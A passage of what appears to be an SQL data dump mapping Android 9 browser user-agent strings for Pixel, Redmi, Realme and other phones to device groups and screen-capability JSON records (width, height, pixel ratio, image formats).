(KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POT-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POT-LX1A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POT-LX1AF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POT-LX1T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POT-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POT-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Philips S561) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Phone 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel 2 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel 3 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel 3a XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":864,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel 3a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":808,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Pixel) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Poco F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Power_6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Prime_4_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; QUEST LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; QUEST) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; R15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; R15_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; R19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; REVVLRY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; REVVLRY+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":424,\"screenHeight\":890,\"pixelRatio\":2.55,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1801) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1805) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1807) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1809) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1811) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1825) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1827) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1921) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1925) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1927) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1941) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1945) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1971) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX1993) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RMX2030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; RVL-AL09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 4 Prime) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 4A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 4X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":683,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 5A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 6 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 7A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 8A Dual) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 8A Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi 8A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi K20 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi K20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 4X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 6 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 7) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 7S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note 8T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 